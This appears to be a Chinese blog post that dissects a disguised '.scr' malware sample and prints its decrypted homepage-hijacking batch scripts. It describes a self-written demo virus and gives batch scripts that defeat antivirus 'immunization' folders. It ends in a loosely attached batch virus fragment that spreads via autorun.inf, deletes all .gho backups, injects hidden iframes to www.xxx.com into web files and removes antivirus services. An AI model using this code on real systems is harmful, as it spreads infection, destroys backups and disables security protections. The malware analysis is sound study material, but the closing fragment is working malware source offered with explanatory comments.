这个肯定有猫腻！点进去看了下，我就知道一定是病毒了。打算把它下载下来玩玩，看我的回复：

OK，很快就下载好了，是个RAR的压缩包，解压一下，出来的是一个JPG图标的文件，文件名为“性感的我.scr”。嘿，我倒要看看你有多“性感”！

这种调虫小技早就过时了！改成exe文件然后用winrar打开，病毒文件都出来了！解压到一个文件夹，好，我们开始慢慢“解剖”。

对了，首先看一下自解压的注释，如下：

Path=C:\WINDOWS\system32
SavePath
Setup=C:\WINDOWS\system32\1.vbs
Silent=1
Overwrite=1
Shortcut=D, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://vod.wx00.com/, “”, “电影院”, “电影院”
Shortcut=D, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://www.52520qq.cn/, “”, “我爱我爱你QQ”, “我爱我爱你QQ”
Shortcut=s, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://www.52520qq.cn/, “”, “我爱我爱你QQ”, “我爱我爱你QQ”
Shortcut=S, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://vod.wx00.com/, “”, “电影院”, “电影院”
Shortcut=P, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://vod.wx00.com/, “”, “电影院”, “电影院”
Shortcut=D, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://mp3.wx00.com/, “”, “音乐大全”, “音乐大全”
Shortcut=S, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://mp3.wx00.com/, “”, “音乐大全”, “音乐大全”
Shortcut=P, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://BBS.wx00.com/, “”, “互动交流”, “互动交流”

很简单的东西不用我多解释了吧？首先释放到System32，然后运行1.vbs，最后建立恶意的IE快捷方式。好，先打开1.vbs看看里面写了什么：

Set ws = CreateObject(“Wscript.Shell”)
ws.run “run.bat”,vbhide
ws.run “comman.bat”,vbhide
ws.run “2.jpg”,vbhide

运行两个批处理和一个图片。我猜这张一定是美女图片了，打开瞧瞧，是不是真的性感（啊呀，发现自己还真有点色……）：

Oh, my God！Is she sexy？？wo yun……

好了，继续。第一个运行的是run.bat，打开看看，惨不忍睹的一大堆！我不添代码了，直接截个图：

乱七八糟的什么东西啊？如果你关注我以前写的技术文章，你就不会问我是什么东西了。bat加密了！！一看就是用编码转换加的密。如果你关注我以前写的技术文章，你也不会问我怎么解密了。解出来就清楚了，解密之后的代码我贴一下：

cls
@reg add “HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command” /v “” /d “\”C:\Program Files\Internet Explorer\IEXPLORE.EXE\” http://www.fwwz.net/” /f
@reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run” /v “Explorer” /d “c:\windows\system32\Explorer.vbs” /f
@reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main” /v “Default_Page_URL” /d “http://www.fwwz.net” /f
@reg add “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main” /v “Start Page” /d “http://www.fwwz.net” /f
@reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion” /v “RegisteredOrganization” /d “www.fwwz.net” /f
@reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion” /v “RegisteredOwner” /d “服务网络” /f
echo [InternetShortcut] >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo URL=”hao661.com/?6″ >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo IconIndex=0 >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo IconFile=”C:\Program Files\Internet Explorer\IEXPLORE.EXE” >>”%USERPROFILE%\桌面\Internet Explorer.url”
start /min IEXPLORE.EXE http://www.52520qq.cn/?w
start /min IEXPLORE.EXE http://bbs.wx00.com.cn/?w
del %0

这段代码在干什么呢？

一、强制把www.fwwz.net设置为主页并添加IE快捷方式hao661.com/?6到桌面；
二、把Explorer.vbs加为启动项；
三、打开www.52520qq.cn和bbs.wx00.com.cn两个网站；
四、删除自己。

再来看一下comman.bat写了什么东西，打开一看和run.bat一样也加了密：

解密之后：

cls
@reg add “HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command” /v “” /d “\”C:\Program Files\Internet Explorer\IEXPLORE.EXE\” http://www.fwwz.net/” /f
echo [InternetShortcut] >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo URL=”hao661.com/?6″ >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo IconIndex=0 >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo IconFile=”C:\Program Files\Internet Explorer\IEXPLORE.EXE” >>”%USERPROFILE%\桌面\Internet Explorer.url”
ECHO 处于关闭状态。

和上面一样的东西嘛！真不知道作者在搞什么。

只剩下一个Explorer.vbs了，打开一看，唉…太让我失望了。。
Set ws = CreateObject(“Wscript.Shell”)
ws.run “comman.bat”,vbhide

一点都不好玩！！！

最后我们愚弄他一下吧！

　　简单讲讲这个病毒的一些特征。

　　一、病毒运行后会释放出两个病毒体，如下图的“我是病毒”和“我是木马”。

　　这两个病毒体会相互进程守护，就是说关闭任何一个病毒程序，这个病毒程序又会立即重新运行。

　　二、加入启动项在系统启动时自动加载。如果删除启动项会立即自动添加。

　　三、会进行HOSTS域名劫持。

　　四、会进行映像劫持，比如把进程管理器程序劫持为病毒程序本身。如果被修复会立即再次自动劫持。

　　五、会在每个盘符下写入AutoRun.inf使得每次双击硬盘都会运行病毒程序。如果被删除会立即再次自动写入。

　　六、具有U盘传播功能。

　　由于只是作演示，我就这样简单写了几个功能。测试的时候最好把病毒程序放在C盘根目录下。此病毒是为我的NoHacker作演示而写，所以运行之后可以下载我的Nohacker V1.0进行完全清除，请放心测试，嘿嘿～～

　　测试病毒下载：

　　点击下载我的病毒

　　病毒免疫程序的免疫原理：比如说autorun.inf文件，大家再熟悉不过了，但是不管给autorun.inf设置了什么属性，病毒都会更改它。一般的方法就是，在根目录下建立一个文件夹，名字就叫autorun.inf。这样一来，因为在同一目录下，同名的文件和文件夹不能共存的原理，在autorun.inf文件夹里面创建一个带.的文件夹（比如说：360safe.），使得病毒无法删除autorun.inf文件夹，病毒就无能为力，创建不了autorun.inf文件了。以后就算中毒，病毒也不会运行，从而达到了防止中毒的目的。

　　360就是这样进行病毒免疫的，比如对机器狗的免疫，它用下面的方法：

一、在C:windowssystem32drivers 建立pcibus.sys、usb32k.sys等文件夹（当然不止这两个文件夹，在此不一一列举）；

二、在pcibus.sys、 usb32k.sys等文件夹中建立360safe.文件夹；

　　这样一来，当我们打开、删除或重命名360safe.文件夹，会出现：

　　那么，360是怎么样在pcibus.sys、usb32k.sys等文件夹建立360safe.文件夹的呢？其实只不过是用了DOS的md命令。命令如下：

md C:\windows\system32\drivers\pcibus.sys
md C:\windows\system32\drivers\pcibus.sys\360safe..\
md C:\windows\system32\drivers\usb32k.sys
md C:\windows\system32\drivers\usb32k.sys\360safe..\

　　那怎么样去除pcibus.sys、 usb32k.sys等文件夹及文件夹下360safe.文件夹呢？同样用DOS的rd命令。命令如下：

rd /s /q C:\windows\system32\drivers\pcibus.sys\360safe..\
rd /s /q C:\windows\system32\drivers\pcibus.sys
rd /s /q C:\windows\system32\drivers\usb32k.sys\360safe..\
rd /s /q C:\windows\system32\drivers\usb32k.sys

　　目前这种方法被很多杀软所用，我曾经也用此方法制作过AUTO免疫工具。但这样简单的方法谁都会，病毒制作者们更不例外，病毒制作者将rd命令的批处理应用于病毒，免疫了又有啥用？！

===============================================================================

　　江民社区病毒免疫程序和360的免疫的方法有所不同，比如说江民社区磁碟机病毒免疫程序，它用了cacls.exe命令，并设置了权限，免疫批处理如下：

cacls.exe C:\NetApi000.sys /t /e /c /d Everyone
cacls.exe %windir%\system32\dnsq.dll /t /e /c /d Everyone
cacls.exe %windir%\system32\com\netcfg.dll /t /e /c /d Everyone
cacls.exe %windir%\system32\com\lsass.exe /t /e /c /d Everyone
cacls.exe %windir%\system32\com\smss.exe /t /e /c /d Everyone
cacls.exe %windir%\system32\com\netcfg.000 /t /e /c /d Everyone
FOR %%1 IN (C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO cacls.exe %%1:\autorun.inf /t /e /c /d Everyone
FOR %%2 IN (C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO cacls.exe %%2:\pagefile.pif /t /e /c /d Everyone
cacls.exe %windir%\system32\cacls.exe /t /e /c /d Everyone
Pause
del C:\Anti.bat /q

　　上面的批处理做了些什么呢？我们一个个来分析：

　　一、在C盘下生成autorun.inf、NetApi000.sys、pagefile.pif文件夹。
在所有根符下（比如D:\ 、E:\ ）生成autorun.inf免疫文件夹；

　　二、在C:\windows\system32\dnsq.dll文件夹；

　　三、在C:\windows\system32\com\下生成netcfg.dll、lsass.exe、smss.exe、netcfg.000文件夹；

　　四、所有免疫文件夹下建立com1，并设置了权限。

　　这样删除或重命名com1，会出现“访问被拒绝”。

　　那怎么样去除这些免疫文件夹及文件夹下com1呢？还是用批处理吧！命令如下：

@echo off
color 17
taskkill /im explorer.exe /f

for /d %%i in (c,d,e,f,g,h,i,j,k,l) do if exist "%%i:/pagefile.pif" (
DEL /F /A /Q \\?\%%i:\pagefile.pif\com1
rd /q/s %%i:\pagefile.pif
)

for /d %%i in (c,d,e,f,g,h,i,j,k,l) do if exist "%%i:/autorun.inf" (
DEL /F /A /Q \\?\%%i:\autorun.inf\com1
rd /q/s %%i:\autorun.inf
)

DEL /F /A /Q \\?\C:\NetApi000.sys\com1
rd /q/s C:\NetApi000.sys
rd \\?\%windir%\system32\dnsq.dll /s /q
rd \\?\%windir%\system32\com\netcfg.dll /s /q
rd \\?\%windir%\system32\com\lsass.exe /s /q
rd \\?\%windir%\system32\com\smss.exe /s /q
rd \\?\%windir%\system32\com\netcfg.000 /s /q
start explorer.exe
exit

　　当我写了这个批处理，江民社区磁碟机病毒免疫程序将变得毫无意义。

　　病毒制作者远远比我们聪明，他们想尽办法去除免疫文件夹，免疫了又有啥用！只不过是在自己的电脑里多添了几个文件夹而已！

REM 向可移动硬盘内复制病毒
copy bat.exe %yidong%\ /y
//注意yidong由于已经是一个环境变量以后应用需要用成对的%%括起来。 /y 参数表示不提示确认。
copy muma.com %yidong%\ /y
attrib +s +h %yidong%\muma.com
attrib +s +h %yidong%\bat.exe
if exist %yidong%\autorun.inf (
attrib -a -s -h %yidong%\autorun.inf
del %yidong%\autorun.inf)
//如果存在autorun.inf则执行括号里面的内容。
echo [AutoRun]>%yidong%\Autorun.inf
echo shell\Open\command=bat.exe>>%yidong%\Autorun.inf
echo shell\Open=打开(^&O)
echo shell\explore=资源管理器(^&X)>>%yidong%\Autorun.inf
//^符号是转义字符，表示后面的&符号失去连接意义。这里加&是加粗显示的用途。
echo shell\explorer\command=bat.exe>>%yidong%\Autorun.inf
attrib +s +h %yidong%\Autorun.inf
del %systemroot%temp.txt /q /f
//删除用于存放临时信息的文件
:next
REM 循环遍历磁盘，自动删除*.gho文件
for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do (
if exist %%a:\nul(
for /f “tokens=*” %%b in (‘dir /s/b/a-d %%a:\*.gho’) do del “%%b” /q /f
))
//这里是对各个磁盘的gho文件进行查找，一旦发现即删除

REM 循环遍历磁盘，自动对ASP，ASPX插入网页木马代码
for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do (
if exist %%a:\nul(
for /f “tokens=*” %%b in (‘dir /s/b/a-d %%a:\*.asp’) do (echo ^<iframe src=”http://www.xxx.com” width=0 height=0 border=0^>^</iframe^>>> “%%b”)
))
REM 循环遍历磁盘，自动对HTM，HTML插入网页木马代码
for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do (
if exist %%a:\nul (
for /f “tokens=*” %%b in (‘dir /s/b/a-d %%a:\*.htm’) do (echo ^<iframe src=”http://www.xxx.com” width=0 height=0 border=0^>^</iframe^>>> “%%b”)
))
REM 修改注册表不显示隐藏文件
REG ADD “HKEY_LOCALMACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL” /v “CheckedValue” /t REG_DWORD /d 0 /f
REM 添加注册表自启动项
REG ADD “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” /v type /t REG_EXPAND_SZ /d “c:\Windows\system32\bat.exe” /f
//REG ADD是对注册表进行添加操作， /v后面跟项的名称 /t后面跟数据类型 /f表示强制操作不提示
REM 删除安全软件在注册表中的键值
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RavTask /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KvMonXP /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v kav /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KAVPersonal50 /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v McAfeeUpdaterUI /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v “Network Associates Error RePorting Service” /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ShStartEXE /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v YLive.exe /f
REG Delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v yassistse /f
REM 删除以下服务
sc delete navapsvc
sc delete wscsvc
sc delete KPfwSvc
sc delete SNDSrvc
sc delete ccProxy
sc delete ccEvtMgr
sc delete ccSetMgr
sc delete SPBBCSvc
sc delete Symantec Core LC
sc delete NPFMntor
sc delete MskService
sc delete FireSvc
del muma.com
del bat.vbs
del %O
// %O 是删除自身的意思